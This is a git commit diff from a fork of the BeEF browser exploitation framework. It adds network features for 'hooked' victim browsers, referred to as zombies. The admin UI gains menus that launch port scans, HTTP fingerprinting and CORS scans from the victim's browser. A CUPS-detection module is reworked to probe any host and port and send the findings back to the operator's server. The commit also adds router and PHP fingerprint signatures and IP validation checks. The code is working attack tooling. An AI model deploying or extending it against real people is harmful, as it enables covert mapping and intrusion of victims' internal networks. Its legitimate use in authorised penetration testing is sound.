Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge branch 'network_extension' of https://github.com/bcoles/beef into bcoles-network_extension

Browse Source
This commit is contained in:
antisnatchor
2015-02-05 10:26:14 +01:00
parent 23cf229dad c099be75ed
commit 5fc1294ca1
15 changed files with 221 additions and 22 deletions
Download Patch File Download Diff File Expand all files Collapse all files

6
core/main/handlers/browserdetails.rb
View File

@@ -351,6 +351,12 @@ module BeEF
# log a few info of newly hooked zombie in the console
print_info "New Hooked Browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}], hooked domain [#{log_zombie_domain}:#{log_zombie_port.to_s}]"
# add localhost as network host
if config.get('beef.extension.network.enable')
print_debug("Hooked browser has network interface 127.0.0.1")
r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => '127.0.0.1', :hostname => 'localhost', :os => BeEF::Core::Models::BrowserDetails.get(session_id, 'OsName'), :cid => 'init')
r.save
end
# Call autorun modules
if config.get('beef.autorun.enable')

157
extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js
View File

@@ -351,7 +351,159 @@ ZombieTab_Network = function(zombie) {
var ip = record.get('ip');
var class_c = ip.split(".")[0]+"."+ip.split(".")[1]+"."+ip.split(".")[2];
var ip_range = class_c+'.1-'+class_c+'.255';
grid.rowCtxMenu = new Ext.menu.Menu({
// menu options for localhost
if (class_c == '127.0.0') {
grid.rowCtxMenu = new Ext.menu.Menu({
items: [
{
text: 'Discover Web Servers',
iconCls: 'network-host-ctxMenu-web',
menu: {
xtype: 'menu',
items: [{
text: 'Host ('+ip+')',
iconCls: 'network-host-ctxMenu-host',
handler: function() {
var mod_id = get_module_id("get_http_servers");
commands_statusbar.update_sending('Favicon scanning ' + ip + ' for HTTP servers...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":ip+'-'+ip}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error sending command');
}
});
}
}]
}
},{
text: 'Fingerprint HTTP',
iconCls: 'network-host-ctxMenu-fingerprint',
menu: {
xtype: 'menu',
items: [{
text: 'Host ('+ip+')',
iconCls: 'network-host-ctxMenu-host',
handler: function() {
var mod_id = get_module_id("internal_network_fingerprinting");
commands_statusbar.update_sending('Fingerprinting ' + ip + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":ip+'-'+ip}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error sending command');
}
});
}
}]
}
},{
text: 'CORS Scan',
iconCls: 'network-host-ctxMenu-cors',
menu: {
xtype: 'menu',
items: [{
text: 'Host ('+ip+')',
iconCls: 'network-host-ctxMenu-host',
handler: function() {
var mod_id = get_module_id("cross_origin_scanner");
commands_statusbar.update_sending('CORS scanning ' + ip + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":ip+'-'+ip}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error sending command');
}
});
}
}]
}
},{
text: 'Port Scan',
iconCls: 'network-host-ctxMenu-network',
menu: {
xtype: 'menu',
items: [{
text: 'Common Ports',
iconCls: 'network-host-ctxMenu-host',
handler: function() {
var mod_id = get_module_id("port_scanner");
var ports = '21,22,23,25,80,81,443,445,1080,8080,8081,8090,8443,3000,3128,3389,3306,5432,6379,10000,10443';
commands_statusbar.update_sending('Port scanning ' + ip + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipHost":ip,"ports":ports}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error sending command');
}
});
}
},{
text: 'Specify Ports',
iconCls: 'network-host-ctxMenu-config',
handler: function() {
var mod_id = get_module_id("port_scanner");
var ports = prompt("Enter ports to scan:", '1,5,7,9,15,20,21,22,23,25,26,29,33,37,42,43,53,67,68,69,70,76,79,80,88,90,98,101,106,109,110,111,113,114,115,118,119,123,129,132,133,135,136,137,138,139,143,144,156,158,161,162,168,174,177,194,197,209,213,217,219,220,223,264,315,316,346,353,389,413,414,415,416,440,443,444,445,453,454,456,457,458,462,464,465,466,480,486,497,500,501,516,518,522,523,524,525,526,533,535,538,540,541,542,543,544,545,546,547,556,557,560,561,563,564,625,626,631,636,637,660,664,666,683,740,741,742,744,747,748,749,750,751,752,753,754,758,760,761,762,763,764,765,767,771,773,774,775,776,780,781,782,783,786,787,799,800,801,808,871,873,888,898,901,953,989,990,992,993,994,995,996,997,998,999,1000,1002,1008,1023,1024,1080,8080,8443,8050,3306,5432,1521,1433,3389,10088');
if (!ports) {
commands_statusbar.update_fail('Cancelled');
return;
}
commands_statusbar.update_sending('Port scanning ' + ip + '...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipHost":ip,"ports":ports}),
dataType: 'json',
type: 'POST',
url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
async: false,
processData: false,
success: function(data){
commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
},
error: function(){
commands_statusbar.update_fail('Error sending command');
}
});
}
}]
}
}]
});
// menu options for all hosts other than 127.0.0.x
} else {
grid.rowCtxMenu = new Ext.menu.Menu({
items: [
{
text: 'Discover Web Servers',
@@ -564,7 +716,8 @@ ZombieTab_Network = function(zombie) {
}]
}
}]
});
});
}
grid.rowCtxMenu.showAt(e.getXY());
},
afterrender: function(datagrid) {

20
modules/exploits/router/asus_rt_series_get_info/module.rb
View File

@@ -29,7 +29,7 @@ class Asus_rt_series_get_info < BeEF::Core::Command
gateway = "#{$5}"
dns_servers = "#{$6}"
if !ip.nil?
if !ip.nil? && BeEF::Filters.is_valid_ip?(ip)
print_debug("Hooked browser found Asus RT series router [ip: #{ip}]")
r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :type => 'Asus Router', :cid => cid)
r.save
@@ -41,21 +41,25 @@ class Asus_rt_series_get_info < BeEF::Core::Command
if client.to_s =~ /^([\d\.]+),([:\dA-F]{17})$/
ip = $1
mac = $2
print_debug("Hooked browser found router client [ip: #{ip}, mac: #{mac}]")
r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :mac => mac, :cid => cid)
r.save
if BeEF::Filters.is_valid_ip?(ip)
print_debug("Hooked browser found router client [ip: #{ip}, mac: #{mac}]")
r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :mac => mac, :cid => cid)
r.save
end
end
end
if !gateway.nil?
if !gateway.nil? && BeEF::Filters.is_valid_ip?(gateway)
print_debug("Hooked browser found WAN gateway server [ip: #{gateway}]")
r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => gateway, :type => 'WAN Gateway', :cid => cid)
r.save
end
if !dns_servers.nil? && dns_servers =~ /^([\d\. ]+)$/
dns_servers.split(/ /).uniq.each do |dns|
print_debug("Hooked browser found DNS server [ip: #{dns}]")
r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => dns, :type => 'DNS Server', :cid => cid)
r.save
if BeEF::Filters.is_valid_ip?(dns)
print_debug("Hooked browser found DNS server [ip: #{dns}]")
r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => dns, :type => 'DNS Server', :cid => cid)
r.save
end
end
end
end

6
modules/host/detect_cups/command.js
View File

@@ -9,14 +9,14 @@ beef.execute(function() {
var result = "Not Installed";
var dom = document.createElement('b');
var img = new Image;
img.src = "http://127.0.0.1:631/images/cups-icon.png";
img.src = "http://<%= @ipHost %>:<%= @port %>/images/cups-icon.png";
img.onload = function() {
if (this.width == 128 && this.height == 128) result="Installed";
beef.net.send('<%= @command_url %>', <%= @command_id %>,'cups='+result);
beef.net.send('<%= @command_url %>', <%= @command_id %>,'proto=http&ip=<%= @ipHost %>&port=<%= @port %>&cups='+result);
dom.removeChild(this);
}
img.onerror = function() {
beef.net.send('<%= @command_url %>', <%= @command_id %>,'cups='+result);
beef.net.send('<%= @command_url %>', <%= @command_id %>,'proto=http&ip=<%= @ipHost %>&port=<%= @port %>&cups='+result);
dom.removeChild(this);
}
dom.appendChild(img);

23
modules/host/detect_cups/module.rb
View File

@@ -5,9 +5,32 @@
#
class Detect_cups < BeEF::Core::Command
def self.options
return [
{'name' => 'ipHost', 'ui_label' => 'IP or Hostname', 'value' => '127.0.0.1'},
{'name' => 'port' , 'ui_label' => 'Port', 'value' => '631'}
]
end
def post_execute
save({'CUPS' => @datastore['cups']})
configuration = BeEF::Core::Configuration.instance
if configuration.get("beef.extension.network.enable") == true
if @datastore['results'] =~ /^proto=(https?)&ip=([\d\.]+)&port=([\d]+)&cups=Installed$/
proto = $1
ip = $2
port = $3
session_id = @datastore['beefhook']
cid = @datastore['cid'].to_i
if BeEF::Filters.is_valid_ip?(ip)
print_debug("Hooked browser found 'CUPS' [proto: #{proto}, ip: #{ip}, port: #{port}]")
r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => 'CUPS', :cid => cid)
r.save
end
end
end
end
end

1
modules/host/get_internal_ip_webrtc/module.rb
View File

@@ -24,6 +24,7 @@ class Get_internal_ip_webrtc < BeEF::Core::Command
ips.uniq.each do |ip|
next unless ip =~ /^[\d\.]+$/
next if ip =~ /^0\.0\.0\.0$/
next unless BeEF::Filters.is_valid_ip?(ip)
print_debug("Hooked browser has network interface #{ip}")
r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :os => os, :cid => cid)
r.save

2
modules/network/cross_origin_scanner/module.rb
View File

@@ -21,7 +21,7 @@ class Cross_origin_scanner < BeEF::Core::Command
ip = $1
port = $2
print_debug("Hooked browser found HTTP server #{ip}:#{port}")
if !ip.nil? && !port.nil?
if !ip.nil? && !port.nil? && BeEF::Filters.is_valid_ip?(ip)
r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => 'http', :ip => ip, :port => port, :type => 'HTTP Server (CORS)', :cid => cid)
r.save
end

2
modules/network/get_http_servers/module.rb
View File

@@ -33,7 +33,7 @@ class Get_http_servers < BeEF::Core::Command
url = $4
session_id = @datastore['beefhook']
cid = @datastore['cid'].to_i
if !ip.nil?
if !ip.nil? && BeEF::Filters.is_valid_ip?(ip)
print_debug("Hooked browser found HTTP Server [proto: #{proto}, ip: #{ip}, port: #{port}]")
r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => "HTTP Server", :cid => cid)
r.save

1
modules/network/identify_lan_subnets/module.rb
View File

@@ -36,6 +36,7 @@ class Identify_lan_subnets < BeEF::Core::Command
hosts.split(',').flatten.each do |ip|
next if ip.nil?
next unless ip.to_s =~ /^([\d\.]+)$/
next unless BeEF::Filters.is_valid_ip?(ip)
print_debug("Hooked browser found host #{ip}")
r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :cid => cid)
r.save

10
modules/network/internal_network_fingerprinting/command.js
View File

@@ -88,6 +88,10 @@ beef.execute(function() {
"Microsoft IIS",
"80","http",false,
"/pagerror.gif",36,48),
new Array(
"PHP",
"80","http",false,
"/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42",120,67),
new Array(
"QNAP NAS",
"8080","http",false,
@@ -97,9 +101,13 @@ beef.execute(function() {
"443","https",false,
"/cgi-bin/images/login/cloud_portal.png",165,32),
new Array(
"Asus Router",
"Asus RT Series Router",
"80","http",false,
"/images/top-02.gif",359,78),
new Array(
"Asus RX Series Router",
"80","http",false,
"/images/bu_blue.gif",82,16),
new Array(
"Belkin Router",
"80","http",false,

2
modules/network/internal_network_fingerprinting/module.rb
View File

@@ -35,7 +35,7 @@ class Internal_network_fingerprinting < BeEF::Core::Command
url = $5
session_id = @datastore['beefhook']
cid = @datastore['cid'].to_i
if !ip.nil?
if !ip.nil? && BeEF::Filters.is_valid_ip?(ip)
print_debug("Hooked browser found '#{discovered}' [ip: #{ip}]")
r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => discovered, :cid => cid)
r.save

1
modules/network/jslanscanner/command.js
View File

@@ -220,6 +220,7 @@ beef.execute(function() {
{make:'SMC',model:'7004ABR',graphic:'/images/logo.gif'},
{make:'DLink',model:'DI524',graphic:'/m524.gif'},
{make:'Cisco',model:'2600',graphic:'/images/logo.png'},
{make:'ASUS',model:'RX Series',graphic:'/images/banner_sys4bg.gif'},
{make:'ASUS',model:'RT Series',graphic:'/images/EZSetup_button.gif'}
];

2
modules/network/jslanscanner/module.rb
View File

@@ -35,7 +35,7 @@ class Fingerprint_routers < BeEF::Core::Command
device = $2
session_id = @datastore['beefhook']
cid = @datastore['cid'].to_i
if !ip.nil?
if !ip.nil? && BeEF::Filters.is_valid_ip?(ip)
print_debug("Hooked browser found network device " + device + " [ip: #{ip}]")
r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :type => device, :cid => cid)
r.save

8
modules/network/ping_sweep/module.rb
View File

@@ -36,9 +36,11 @@ class Ping_sweep < BeEF::Core::Command
# save the network host
if @datastore['results'] =~ /host=([\d\.]+) is alive/
ip = $1
print_debug("Hooked browser has network interface #{ip}")
r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :cid => cid)
r.save
if BeEF::Filters.is_valid_ip?(ip)
print_debug("Hooked browser has network interface #{ip}")
r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :cid => cid)
r.save
end
end
end

2
modules/network/port_scanner/module.rb
View File

@@ -38,7 +38,7 @@ class Port_scanner < BeEF::Core::Command
service = $4
session_id = @datastore['beefhook']
cid = @datastore['cid'].to_i
if !ip.nil?
if !ip.nil? && BeEF::Filters.is_valid_ip?(ip)
print_debug("Hooked browser found network service [ip: #{ip}, port: #{port}]")
r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => 'http', :ip => ip, :port => port, :type => service, :cid => cid)
r.save